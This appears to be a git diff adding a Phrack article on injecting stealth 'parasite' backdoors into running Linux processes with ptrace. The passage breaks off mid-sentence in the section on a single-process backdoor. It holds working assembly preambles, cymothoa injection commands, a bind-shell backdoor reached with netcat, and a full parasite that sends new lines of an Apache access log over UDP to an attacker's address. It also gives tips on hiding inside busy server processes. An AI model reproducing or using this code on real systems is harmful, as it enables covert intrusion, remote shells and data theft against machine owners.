+MUI3'LA&NN6I:*]J:;WF1S!Y[B^FZPVIQ\S+XZC.LX2D"(^-E\;C*?,E'PERZ
+MMNQ.G?LRINXX8`U;UG)0$@=%'3FBMM@T[P''MMTIJFOA'BQJYEHEV[S1J8F<
+MD8V@25#0L=NG#2NWRLRIPZ0@IZ[->["<N2NG;_&2I-&A64A.R^;I#A5V+RRH
+M8_GNDM.V@K]!3ML2XH3EF\&D,0\G15!2[K^E#[.*#5D]9AT#^7!92[=/2U_2
+MXLXJ'`L)LB7A4T/KB-`^..R^L?]3D_?]#QNP3X[_FG.NO__CO,-_?<K4N++;
+M_F&OT`"BWPLOMKLMU]V6DX7=;;GNMEQW6ZZ[+?>?=5ONCY[(N]2E+G6I2UWJ
+M4I>ZU*4N=:E+7>I2E[K4I2YUJ4M=ZE*7NM2E+G6I2UWJ4I>ZU*4N=:E+7>K2
+,?TWZ/VX96&``\```
+`
+end
+
+
+--[ EOF
diff --git a/phrack68/9.txt b/phrack68/9.txt
new file mode 100644
index 0000000..14bee51
--- /dev/null
+++ b/phrack68/9.txt
@@ -0,0 +1,1472 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x09 of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=---------------------=[ Single Process Parasite ]=---------------------=|
+|=----------------=[ The quest for the stealth backdoor ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ by Crossbower ]=--------------------------=|
+|=-----------------------------------------------------------------------=|
+
+Index
+
+------[ 0. Introduction
+------[ 1. Brief discussion on injection methods
+------[ 2. First generation: fork() and clone()
+------[ 3. Second generation: signal()/alarm()
+------[ 4. Third generation: setitimer()
+------[ 5. Working parasites
+------------[ 5.1 Process and thread backdoor
+------------[ 5.2 Remote "tail follow" parasite
+------------[ 5.3 Single process backdoor
+------[ 6. Something about the injector
+------[ 7. Further readings
+------[ 8. Links and references
+
+------[ 0. Introduction
+
+In biology a parasite is an organism that grows, feeds, and live in a
+different organism while contributing nothing to the survival of its host.
+
+(There is another interesting definition that, even if it's less relevant,
+I find funny: a professional dinner guest, especially in ancient Greece.
+>From Greek parastos, person who eats at someone else's table,
+parasite : para-,beside; stos, grain, food.)
+
+So, without digressing too much, what do we mean by "parasite" in this
+document? A parasite is simply some executable code that lives within
+another process, but that was injected after its loading time, by a
+third person/program.
+
+Any process can become infected quite easily, using standard libraries
+provided by operating systems (we will use process trace, ptrace [0]).
+
+The real difficulty for the parasite is to coexist peacefully with the host
+process, without killing it. For "death" of the host we also intend a
+situation where, even if the process remains active, it is no longer
+able to work properly, because its memory has been corrupted.
+
+The of goal this document is to create a parasite that live and let live
+the host process, as if nothing had happened.
+
+Starting with simple techniques, and and gradually improving the parasite,
+we'll reach a point where our creature is scheduled inside the process of
+the host, without the need of fork() or similar calls (i.e. clone()).
+
+An interesting question is: why a parasite is an excellent backdoor?
+
+The simplest answer is that a parasite hides what is not permitted in what
+is allowed, so that:
+  - it's difficult to detect using conventional tools
+  - it's more stable and easy to use than kernel-level rootkits.
+
+If the target system has security tools that automatically monitor the
+integrity of executable files, but that do not perform complete audits of
+memory, the parasite will not trigger any alarm.
+
+After this introduction we can dive into the problematic.
+
+If you prefer practical examples, you can "jump" to paragraph 5,
+which shows three different types of real parasite.
+
+------[ 1. Brief discussion on injection methods
+
+To separate the creation of the shellcode from the methods used to inject
+it into the host process, this section will discuss how the parasite is
+injected (in the examples of this document).
+
+Unlike normal shellcode that, depending on the vulnerability exploited,
+can not contain certain types of characters (e.g. NULLs), a parasite has
+no particular restrictions.
+
+It can contain any character, even NULL bytes, because ptrace [0] allows to
+modify directly the .text section of a process.
+
+The first question that arises regards where to place parasitic code.
+This memory location must not be essential to the program, and should not
+be invoked by the code after the start (or shortly after the start) of
+the host process.
+
+We can use run-time patching, but it's complicated technique and makes it
+difficult to ensure the correct functioning of the process after the
+manipulation. It is therefore not suitable for complex parasites.
+
+The author has chosen to inject the code into the memory range of libdl.so
+library, since it is used during the loading stage of programs but then
+usually no longer necessary (more info: [1][2]).
+
+Another reason for this choice is that the memory address of the library,
+when loaded into the process, is exported in the /proc filesystem.
+
+You can easily see that by typing:
+$ cat /proc/self/maps
+...
+b7778000-b777a000 rw-p 00139000 fe:00 37071197   /lib/libc-2.7.so
+b777a000-b777d000 rw-p b777a000 00:00 0
+...
+b7782000-b779c000 r-xp 00000000 fe:00 37071145   /lib/ld-2.7.so  <---
+...
+
+Libdl is mapped at the range b7782000-b779c000 and is executable. The
+injected starting at the initial address of the range is perfectly
+executable.
+
+Some considerations about this method: if the infected program uses
+dlopen(), dlclose() or dlsym() during its execution, some problems
+could arise. The solution is to inject into the same library, but in
+unused memory locations.
+(From the tests of the author the initial memory locations of the library
+are not critical and do not affect the execution of programs.)
+
+There are other problems on linux systems that use the grsec kernel patch.
+Using this patch the text segment of the host process  is marked
+read/execute only and therefore will not be writable with ptrace.
+If that's your case, Ryan O'Neill has published a very powerful
+algorithm [3] that exploits sysenter instructions (used by the host's code)
+to execute a serie of system calls (the algorithm is able to
+allocate and set the correct permission on a new memory area without
+modifying the text segment of the traced process).
+I recommend everyone read the document, as it is very interesting.
+
+The other premise, I want to do in this section, regards the basic
+informations the injector (the program that injects the parasite) must
+provide to the shellcode to restore the execution of the host program.
+
+Our implementation of the injector gets the current EIP (Instruction
+Pointer) of the host process, push it on the stack and writes in the EIP
+the address of the parasite (injected into libdl).
+
+The parasite, in its initialization part, saves every register it uses.
+Then, at the end of its execution, every modified register is restored.
+A simple way to do this is to push and pop the registers with the
+instructions PUSHA and POPA.
+
+After that, a simple RET instruction restores the execution of the host
+process, since the its saved EIP is on the top of the stack.
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+parasite_skeleton:
+
+    # preamble
+    push %eax       # save registers
+    push %ebx       # used by the shellcode
+
+    # ...
+    # shellcode
+    # ...
+
+    # epilogue
+    pop %ebx        # restore modified registers
+    pop %eax        # ...
+
+    ret             # restore execution of the host
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+Another very useful information the injector provides to the shellcode,
+is the address of a persistent memory location. In the case of this
+document, the address is also taken from /proc/pid/maps:
+
+...
+b7701000-b771c000 r-xp 00000000 08:03 1261592    /lib/ld-2.11.1.so
+b771c000-b771d000 r--p 0001a000 08:03 1261592    /lib/ld-2.11.1.so
+b771d000-b771e000 rw-p 0001b000 08:03 1261592    /lib/ld-2.11.1.so <--
+...
+
+The range b771d000-b771e000 has read and write permission and it's
+suitable for this purpose.
+
+Other techniques exists to dynamically create writable and executable
+memory locations, such as the use of mmap() in the host process. But these
+techniques are beyond the scope of this article and will not be analyzed
+here.
+
+Since the necessary premises have been made, we can discuss the first
+generation of our stealth parasite.
+
+------[ 2. First generation: fork() and clone()
+
+The simplest idea to allow the host process to continue its execution
+properly and, at the same time, hide the parasite, is the use of the
+fork() syscall (or the creation of a new thread, not analyzed here).
+
+Using fork() the process is splitted in two:
+ - the parent process (the original one) can continue its normal execution
+ - the child process, instead, will execute the parasite
+
+An important thing to note, is that the child process inherits the parent's
+name and a copy of its memory.
+
+This means that if we inject the parasite in the process "server1",
+another process "server1" will be created as its child.
+
+Before the injection:
+# ps -A
+...
+...
+ 5478 ?        00:00:00 server1
+...
+
+After the injection:
+# ps -A
+...
+...
+ 5478 ?        00:00:00 server1
+ 5479 ?        00:00:00 server1
+...
+
+If the host process is carefully chosen, the parasite will be very hard
+to detect. Just think of some network services (such as apache2) that
+generate a lot of children: a single child process is unlikely to be
+detected.
+
+The fork parasite can be implemented as a preamble preceding the real
+shellcode:
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+fork_parasite:
+    push %eax       # save %eax value (needed by parent process)
+
+    push $2
+    pop %eax
+    int $0x80       # fork
+
+    test %eax, %eax
+    jz shellcode    # child:  jumps to shellcode
+
+    pop %eax        # parent: restores host process execution
+    ret
+
+shellcode:          # append your shellcode here
+    # ...
+    # ...
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+The preamble simply makes a call to fork(), analyzes the results, and
+decides the execution path to choose.
+
+With this implementation, any existing shellcode can be turned into a
+parasite: it's responsibility of the injector to concatenate the parts
+before inserting them in the host.
+
+A very similar technique uses clone() instead of fork(). We can consider
+clone() a generalization of the fork() syscall through which it's possible
+to create both processes and threads.
+
+The difference is in the options passed to the syscall. A thread is
+generated using particular flags:
+
+  - CLONE_VM  the calling process and the child process run in the same
+              memory space. Memory writes performed by the calling process
+              or by the child process are also visible in the other
+              process.
+              Any memory mapping or unmapping performed by the child or
+              the calling process also affects the other process.
+
+  - CLONE_SIGHAND  the calling process and the child process share the same
+                   table of signal handlers.
+
+  - CLONE_THREAD  the child is placed in the same thread group as the
+                  calling process.
+
+The CLONE_THREAD flag is the most important: it is what distinguishes what
+we call the "process" from what we call "thread" at least on linux systems.
+
+Let's see how the clone() preamble is implemented:
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+clone_parasite:
+    pusha           # save registers (needed by parent process)
+
+    # call to sys_clone
+
+    xorl    %eax, %eax
+    mov     $120, %al
+
+    movl     $0x18900, %ebx # flags: CLONE_VM|CLONE_SIGHAND|
+                            #        CLONE_THREAD|CLONE_PARENT
+
+    int     $0x80           # clone
+
+    test %eax, %eax
+    jz shellcode    # child:  jumps to shellcode
+
+    popa            # parent: restores host process execution
+    ret
+
+shellcode:          # append your shellcode here
+    # ...
+    # ...
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+The code is based on the fork() preamble, and its behaviour is very
+similar. The difference is in the result.
+
+Before the injection (single threaded process):
+# ps -Am
+...
+...
+ 8360 pts/3    00:00:00 server1
+    - -        00:00:00 -
+...
+
+After the injection (an additional thread is created):
+# ps -A
+...
+...
+ 8360 pts/3    00:00:00 server1
+    - -        00:00:00 -
+    - -        00:00:00 -
+...
+
+Surely the generation of a thread is more stealthy than the generation of a
+process. However there is a small disadvantage, if the parasite thread
+alters parts of the main thread can bring the host to a crash:
+the use of the resources, that are shared, must be much more careful.
+
+We have just seen how to create parasites executed as independent processes
+or threads.
+
+However, these types of parasites are not completely invisible. In some
+circumstances, and in the case of particular (monitored) processes, the
+generation of a child (process or thread) can be problematic or easily
+detectable.
+
+Therefore, in the next section, we will discuss in a different type of
+parasite/preamble, deeply integrated with its host.
+
+------[ 3. Second generation: signal()/alarm()
+
+If we don't like the creation of another process to execute our parasite
+we need some kind of time sharing mechanism inside a single process (did
+you see the title of this document?)
+
+It's a scheduling problem: when a new process is created, the operating
+system takes care of assigning it time and resources necessary to its
+execution.
+If we don't want to rely on this mechanism, we have to simulate a scheduler
+within a single process, to allow a concurrent execution of parasite and
+host, using (usually) asynchronous events.
+
+When you think of asynchronous events in a Unix-like system, the first
+thing that comes to mind are signals.
+If a process registers a handler for a specific signal, when the signal
+is sent the operating system stops its normal execution and makes a
+(void function) call to the handler.
+When the handler returns, the execution of the process is restored.
+
+There are several functions provided by the operating system to generate
+signals. In this chapter we'll use alarm().
+
+Alarm() arranges for a SIGALRM signal to be delivered to the calling
+process when an arbitrary number of seconds has passed.
+Its main limitation is that you can not specify time intervals shorter than
+one second, but this is not a problem in most cases.
+
+Our parasite/preamble needs to register itself as a handler for the signal
+SIGALRM, and renew the timer every time it is executed, to be called at
+regular intervals.
+This creates a kind of scheduler within a single process, and there is no
+the need to call fork() (or functions to create threads).
+
+Here is our second generation parasite/preamble:
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+# signal/alarm parasite
+
+handler:
+    pusha
+    # alarm(timeout)
+    xorl    %eax, %eax
+    xorl    %ebx, %ebx
+    mov     $27, %al
+    mov     $0x1, %bl    # 1 second
+    int     $0x80
+
+schedule:
+    # signal(SIGALRM, handler)
+    xorl    %eax, %eax
+    xorl    %ebx, %ebx
+    mov    $48, %al
+    mov    $14, %bl
+    jmp    schedule_end   # load schedule_end address
+load_handler:
+    pop    %ecx
+    subl    $0x23, %ecx   # adjust %ecx to point handler()
+    int    $0x80
+    popa
+    jmp    shellcode
+
+schedule_end:
+    call load_handler
+
+shellcode:        # append your shellcode here
+    # ...
+    # ...
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+Of course the type of shellcode you can append to the preamble must
+be aware of the "alternative" scheduling mechanism.
+
+It must be able to split its operations between multiple calls, and must
+also not take too much time to run a single step (i.e. a single call),
+to not slow down the host program or overlap with the next handler call.
+
+In short, a call to the handler (our parasite), to work properly must last
+less than the timer interval.
+
+However, alert() is not the only function able to simulate a scheduler.
+In the next chapter we will see a more advanced function, which allows a
+more granular control of the execution of the parasite.
+
+------[ 4. Third generation: setitimer()
+
+We've just arrived at the latest generation of the parasite.
+In the first part of the chapter we'll spend some time to analyze the
+function setitimer(), on which the code is based.
+
+The definition of the function is:
+int setitimer(int which, const struct itimerval *new_value,
+                     struct itimerval *old_value);
+
+As in the case of alarm(), the function setitimer() provides a mechanism
+for a process to interrupt itself in the future using signals.
+Unlike alarm, however, you can specify intervals of a few microseconds and
+choose various types of timers and time domains.
+
+The argument "int which" allows to choose the type of timer and therefore
+the signal that will be sent to the process:
+
+ITIMER_REAL    0x00  the most used timer, it decrements in real time, and
+                     delivers SIGALRM upon expiration.
+
+ITIMER_VIRTUAL 0x01  decrements only when the process is executing, and
+                     delivers SIGVTALRM upon expiration.
+
+ITIMER_PROF    0x02  decrements both when the process executes and when the
+                     system is executing on behalf of the process. Coupled
+                     with  ITIMER_VIRTUAL, this timer is usually used to
+                     profile the time spent by the application in user and
+                     kernel space.  SIGPROF is delivered upon expiration.
+
+We will use ITIMER_REAL because it allows the generation of signal at
+regular intervals, and is not influenced by environmental factors such as
+the workload of a system.
+
+The argument "const struct itimerval *new_value" points to an itimerval
+structure, defined as:
+
+struct itimerval {
+    struct timeval it_interval; /* next value */
+    struct timeval it_value;    /* current value */
+};
+
+struct timeval {
+    long tv_sec;                /* seconds */
+    long tv_usec;               /* microseconds */
+};
+
+The last timeval structure, it_value, is the period between the calling of
+the function and the first timer interrupt. If zero, the alarm is disabled.
+
+The second one, it_interval, is the period between successive timer
+interrupts. If zero, the alarm will only be sent once.
+
+We'll set both structures at the same time interval.
+
+The last argument, "struct itimerval *old_value", if not NULL, will be set
+by the function at the value of the previous timer. We'll not use this
+feature.
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+# setitimer parasite
+
+setitimer_hdr:
+    pusha
+    # sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
+    xorl    %eax, %eax
+    xorl    %ebx, %ebx
+    xorl    %edx, %edx
+    mov     $104, %al
+    jmp     struct_itimerval # load itimervar structure
+load_struct:
+    pop     %ecx
+    int     $0x80
+    popa
+    jmp     handler
+
+struct_itimerval:
+    call    load_struct
+    # itimerval structure: you can modify the values
+    # to set your time intervals
+    .long    0x0       # seconds
+    .long    0x5000    # microseconds
+    .long    0x0       # seconds
+    .long    0x5000    # microseconds
+
+# signal handler, called by the timer
+handler:
+    pusha
+    # signal(SIGALRM, handler)
+    xorl    %eax, %eax
+    xorl    %ebx, %ebx
+    mov    $48, %al
+    mov    $14, %bl
+    jmp    handler_end   # load handler_end address
+load_handler:
+    pop    %ecx
+    subl    $0x19, %ecx  # adjust %ecx to point handler()
+    int    $0x80
+    popa
+    jmp    shellcode
+
+handler_end:
+    call load_handler
+
+shellcode:        # append your shellcode here
+    # ...
+    # ...
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+The usage of this preamble is similar to the previous (alarm) one, there
+is only the necessity of a fine-tuned timer: a compromise between the
+frequency of executions and the stability of the parasite, which must be
+able to carry out its operations in less time than a timer's cycle.
+
+You can work around this problem by transforming these preambles
+(including the preamble that makes use of alarm()) in epilogues, so that
+the timer starts counting only after the parasite has finished its
+operations.
+
+In fact we are going to see how this was implemented in the real parasites
+presented below.
+
+------[ 5. Working parasites
+
+Here we come to the practical part. Three working parasites will be
+presented: one for each technique exposed in the theoretical part of the
+document.
+
+To inject the parasites the injector cymothoa [4] was used, written by the
+same author, and which already includes the codes presented in the article.
+Although it is possible, through various techniques, to inject shellcodes
+in processes, the download of the program is recommended to try the
+examples during the lecture.
+
+------------[ 5.1 Process and thread backdoor
+
+Our first real parasite is a backdoor created by applying, to pre-existing
+shellcode, the fork() preamble.
+The shellcode used was developed by izik (izik@tty64.org) and is
+available on several sites [5]. For this reason will not be reported.
+
+The shellcode is a classic exploit shellcode: it binds /bin/sh to a TCP
+port and fork a shell for every connection.
+
+Using it aided by an injector, has several advantages:
+  - The ability to configure its behavior. In this case the possibility to
+    choose the port to listen on.
+  - The possibility of keeping the host alive using a one of the
+    preamble shown earlier.
+  - Not having to worry about memory locations necessary to the execution
+    and data storage, since they are automatically provided.
+
+Let's see in practice how this parasite works...
+
+First, on the victim machine, we must identify a suitable host process.
+In this example we will use an instance of cat, since it's really easy to
+check if it continues its execution after the injection.
+
+root@victim# ps -A | grep cat
+ 1727 pts/6    00:00:00 cat
+
+We need this pid for the injection:
+
+root@victim# cymothoa -p 1727 -s 1 -y 5555
+[+] attaching to process 1727
+
+ register info:
+ -----------------------------------------------------------
+ eax value: 0xfffffe00   ebx value: 0x0
+ esp value: 0xbf81e1c8   eip value: 0xb78be430
+ ------------------------------------------------------------
+
+[+] new esp: 0xbf81e1c4
+[+] payload preamble: fork
+[+] injecting code into 0xb78bf000
+[+] copy general purpose registers
+[+] detaching from 1727
+
+[+] infected!!!
+root@victim#
+
+The process is now infected: we should be able to see two cat instances,
+the original one and the new one that corresponds to the parasite:
+
+root@victim# ps -A | grep cat
+ 1727 pts/6    00:00:00 cat
+ 1842 pts/6    00:00:00 cat
+
+If, from a different machine, we try to connect to the port 5555, we should
+get a shell:
+
+root@attacker# nc -vv victim 5555
+Connection to victim 5555 port [tcp/*] succeeded!
+uname -a
+Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
+whoami
+root
+
+At the same time, if we write a few lines in the console where the original
+cat is running, we should see the usual output:
+
+root@victim# cat
+test123
+test123
+foo
+foo
+
+The backdoor function properly: the two processes are running at the same
+time without crashing...
+
+The same backdoor can also be injected in a similar way using the clone()
+preamble, and thus running the parasite as a new thread instead of a new
+process.
+
+The command is similar, we only disable the fork() preamble and force
+clone() instead:
+
+root@victim# cymothoa -p 9425 -s 1 -y 5555 -F -b
+[+] attaching to process 9425
+
+ register info:
+ -----------------------------------------------------------
+ eax value: 0xfffffe00   ebx value: 0x0
+ esp value: 0xbfb4beb8   eip value: 0xb78da430
+ ------------------------------------------------------------
+
+[+] new esp: 0xbfb4beb4
+[+] payload preamble: thread
+[+] injecting code into 0xb78db000
+[+] copy general purpose registers
+[+] detaching from 9425
+
+[+] infected!!!
+
+If we execute ps without special flags we now see only one process:
+
+root@victim# ps -A | grep cat
+ 9425 pts/3    00:00:00 cat
+
+But with the option -m we see an additional thread:
+
+root@victim# ps -Am
+...
+ 9425 pts/3    00:00:00 cat
+    - -        00:00:00 -
+    - -        00:00:00 -
+...
+...
+
+Using netcat on the port 5555 of the victim machine works as expected.
+
+Some notes on the proper use of the fork() and clone() preambles:
+  - This preamble is compatible with virtually any existing shellcode,
+    without any modification. It can be used to easily transform into
+    parasitic code what you have already written.
+    In the case of clone() preamble the situation is slightly more critical
+    because there is the possibility that the parasite thread interferes
+    with the host thread. However, widespread shellcodes are usually
+    already attentive to these issues, and should not cause problems.
+  - It is better to inject the parasite into servers that generate many
+    child processes. Some of those tested by me are apache2, dhclient3 and,
+    in the case of a desktop system, the processes of the window manager.
+    It's hard to find a needle in a haystack, and it is difficult to tell
+    a single parasite from dozens of apache2 processes ;)
+
+------------[ 5.2 Remote "tail follow" parasite
+
+Have you ever used tail with the "-f" (follow)  option? This mode is used
+to monitor text files, usually logs, to see in real time the new lines
+added by other processes.
+
+Tail accepts as option a sleep interval, a waiting time between a
+control of the file and another.
+
+It's therefore natural, when writing a parasite with the same function, to
+use a preamble that allows a precise control of time: the setitimer()
+preamble.
+
+This is the code of this new parasite... It is more complex than the
+previous codes.
+After the source there will be a brief explanation of its operations, and
+finally an example of its practical use.
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<
+
+#
+# Scheduled tail setitimer parasite
+#
+
+#
+# Preamble
+#
+
+setitimer_hdr:
+	pusha
+	# sys_setitimer(ITIMER_REAL, *struct_itimerval, NULL)
+	xorl    %eax, %eax
+	xorl    %ebx, %ebx
+	xorl    %edx, %edx
+	mov     $104, %al
+	jmp     struct_itimerval
+load_struct:
+	pop	%ecx
+	int	$0x80
+	popa
+	jmp	handler
+
+struct_itimerval:
+	call	load_struct
+	# these values are replaced by the injector:
+	.long   0x0#53434553  # seconds
+	.long   0x5343494d  # microseconds
+	.long   0x0#53434553  # seconds
+	.long   0x5343494d  # microseconds
+
+handler:
+	pusha
+	# signal(SIGALRM, handler)
+	xorl	%eax, %eax
+	xorl	%ebx, %ebx
+	mov	$48, %al
+	mov	$14, %bl
+	jmp	handler_end
+load_handler:
+	pop	%ecx
+	subl	$0x19, %ecx # adjust %ecx to point handler()
+	int	$0x80
+	popa
+	jmp	shellcode
+
+handler_end:
+	call load_handler
+#
+# The shellcode starts here
+#
+
+shellcode:
+	pusha
+
+	# check if already initialized
+	mov     $0x4d454d50, %esi  # replaced by the injector
+                                   # (persistent memory address)
+	mov     (%esi), %eax
+	cmp     $0xdeadbeef, %eax
+	je      open_call          # jump if already initialized
+
+	# initialize
+	mov     $0xdeadbeef, %eax
+	mov     %eax, (%esi)
+	add     $4, %esi
+	xorl    %eax, %eax
+	mov     %eax, (%esi)
+	sub     $4, %esi
+
+open_call:
+	# call to sys_open(file_path, O_RDONLY)
+	xorl    %eax, %eax
+	mov     $5, %al
+	jmp     file_path
+load_file_path:
+	pop     %ebx
+	xorl    %ecx, %ecx
+	int     $0x80       # %eax = file descriptor
+	mov     %eax, %edi  # save file descriptor
+
+check_file_length:
+	# call to sys_lseek(fd, 0, SEEK_END)
+	mov     %edi, %ebx
+	xorl    %eax, %eax
+	mov     $19, %al
+	xorl    %ecx, %ecx
+	xorl    %edx, %edx
+	mov     $2, %dl
+	int     $0x80  # %eax = end of file offset (eof)
+
+	# get old eof, and store new eof
+	add     $4, %esi
+	mov     (%esi), %ebx
+	mov     %eax, (%esi)
+
+	# skip the first read
+	test    %ebx, %ebx
+	jz      return_to_main_proc
+
+	# check if file is larger
+	# (current end of file > previous end of file)
+	cmp     %eax, %ebx
+	je      return_to_main_proc # eof not changed:
+                                    # return to main process
+
+calc_data_len:
+	# calculate new data length
+	# (current eof - last eof)
+	mov     %eax, %esi
+	sub     %ebx, %esi # saved in %esi
+
+set_new_position:
+	# call to sys_lseek(fd, last_eof, SEEK_SET)
+	xorl    %eax, %eax
+	mov     $19, %al
+	mov     %ebx, %ecx
+	mov     %edi, %ebx
+	xorl    %edx, %edx
+	int     $0x80  # %eax = last end of file offset
+
+read_file_tail:
+	# allocate buffer
+	sub     %esi, %esp
+
+	# call to sys_read(fd, buf, count)
+	xorl    %eax, %eax
+	mov     $3, %al
+	mov     %edi, %ebx
+	mov     %esp, %ecx
+	mov     %esi, %edx
+	int     $0x80       # %eax = bytes read
+	mov     %esp, %ebp  # save pointer to buffer
+
+open_socket:
+	# call to sys_socketcall($0x01 (socket), *args)
+	xorl    %eax, %eax
+	mov     $102, %al
+	xorl    %ebx, %ebx
+	mov     $0x01, %bl
+	jmp     socket_args
+load_socket_args:
+	pop     %ecx
+	int     $0x80  # %eax = socket descriptor
+	jmp     send_data
+
+socket_args:
+	call load_socket_args
+	.long	0x02	# AF_INET
+	.long	0x02	# SOCK_DGRAM
+	.long	0x00	# NULL
+
+send_data:
+
+	# prepare sys_socketcall (sendto) arguments
+	jmp     struct_sockaddr
+load_sockaddr:
+	pop     %ecx
+	push    $0x10   # sizeof(struct_sockaddr)
+	push    %ecx    # struct_sockaddr address
+	xorl    %ecx, %ecx
+	push    %ecx    # flags
+	push    %edx    # buffer len
+	push    %ebp    # buffer pointer
+	push    %eax    # socket descriptor
+
+	# call to sys_sendto($11 (sendto), *args)
+	xorl    %eax, %eax
+	mov     $102, %al
+	xorl    %ebx, %ebx
+	mov     $11, %bl
+	mov     %esp, %ecx
+	int     $0x80
+	jmp     restore_stack
+
+struct_sockaddr:
+	call load_sockaddr
+	.short	0x02        # AF_INET
+	.short	0x5250      # PORT (replaced by the injector)
+	.long	0x34565049  # DEST IP (replaced by the injector)
+
+restore_stack:
+	# restore stack
+	pop     %ebx    # socket descriptor
+	pop     %eax    # buffer pointer
+	pop     %edx    # buffer len
+	pop     %eax    # flags
+	pop     %eax    # struct_sockaddr address
+	pop     %eax    # sizeof(struct_sockaddr)
+
+	# deallocate buffer
+	add     %edx, %esp
+
+
+close_socket:
+	# call to sys_close(socket)
+	xorl    %eax, %eax
+	mov     $6, %al
+	int     $0x80
+
+return_to_main_proc:
+
+	# call to sys_close(fd)
+	xorl    %eax, %eax
+	mov     $6, %al
+	mov     %edi, %ebx
+	int     $0x80
+
+	# return
+	popa
+	ret
+
+file_path:
+	call load_file_path
+	.ascii  "/var/log/apache2/access.log"
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+The code is not written in a super-compact way, since the space it's not
+a problem and the ease of programming and modification has been preferred.
+
+The code can be summarized in a few steps:
+1) Preable (we already know).
+2) Check to see if it's the first execution. This step makes use of a
+   persistent memory location, provided by the injector.
+3) File open and check of length.
+4) Comparison with previous file's length.
+4.1) If unchanged the parasite returns the execution to the host process.
+4.2) If changed the execution continues.
+5) Read the new lines of the file.
+6) Send the new lines to the attacker via UDP
+7) Restore the stack
+8) Return the execution to the host process.
+
+The shellcode receives several parameters from the injector: the address
+of a persistent memory location, the attacker IP address and port, and the
+microsecond interval for the timer.
+
+The injector simply replaces known hexadecimal mark with these parameters
+during the injection. You can see where the replacements occur looking
+at the comments of the code.
+
+Now on to the fun part: the practical use of the parasite.
+
+The first thing to do is to prepare the server on the attacker's machine
+to receive data. Inside the main directory of the injector is present a
+simple implementation of UDP server.
+
+You need only to specify an available port:
+
+root@attacker# ./udp_server 5555
+./udp_server: listening on port UDP 5555
+
+Now we can move to the victim's machine, and choose suitable process.
+For simplicity we will use cat again.
+
+To inject the parasite we must specify some parameters:
+
+root@victim# ./cymothoa -p `pidof cat` -s 14 -k 5000 -x attacker_ip -y 5555
+[+] attaching to process 4694
+
+ register info:
+ -----------------------------------------------------------
+ eax value: 0xfffffe00   ebx value: 0x0
+ esp value: 0xbfa9f3f8   eip value: 0xb77e8430
+ ------------------------------------------------------------
+
+[+] new esp: 0xbfa9f3f4
+[+] injecting code into 0xb77e9000
+[+] copy general purpose registers
+[+] persistent memory at 0xb7805000 (if used)
+[+] detaching from 4694
+
+[+] infected!!!
+
+The process is now infected. No new process has been created.
+
+Now, assuming an apache2 server is running, we can try to make some
+requests to the server to update /var/log/apache2/access.log (the file
+we are monitoring).
+
+root@attacker# curl victim_ip
+<html><body><h1>It works!</h1>
+<p>This is the default web page for this server.</p>
+<p>The web server software is running but no content has been added.</p>
+</body></html>
+
+If everything worked properly we should see, in the console of the UDP
+server UDP, the new lines generated by our requests:
+
+root@attacker# ./udp_server 5555
+./udp_server: listening on port UDP 5555
+::1 - - [26/May/2011:11:18:57 +0200] "GET / HTTP/1.1" 200 460 "-"
+"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
+zlib/1.2.3.3 libidn/1.15"
+::1 - - [26/May/2011:11:19:26 +0200] "GET / HTTP/1.1" 200 460 "-"
+"curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 OpenSSL/0.9.8k
+zlib/1.2.3.3 libidn/1.15"
+...
+
+Et voila, we have a remote file sniffer!
+
+Of course the connections do not appear in the output of tools like
+netstat, as they are only brief exchanges of data, and sockets are open
+only when the monitored file has new lines (and immediately closed).
+
+Some notes on the proper use of this preamble and parasite:
+  - This preamble is usually not compatible with virtually existing
+    shellcode. The code must be modified to return the execution to the
+    host process, restoring stack and registers.
+  - It is better to inject the parasite into servers that run all the time
+    the machine is on, but do not use processor very much. The server
+    dhclient3 is a perfect host.
+
+------------[ 5.3 Single process backdoor
+
+We have just arrived at the last and perhaps most interesting example of
+parasite of this document.
+That's what the author wanted to obtain: a backdoor that can live within
+another process, without calls to fork() and without creating new threads.
+
+The backdoor listens on a port (customizable by the injector), and
+periodically checks if a client is connected. This part has been
+implemented using nonblocking sockets and a modified alarm() preamble.
+
+When a client is connected, it obtains a shell: the only time a call
+to fork() is made.
+
+As long as the backdoor is in listening mode, the only way to notice its
+presence is to check the listening ports on the machine, but even in this
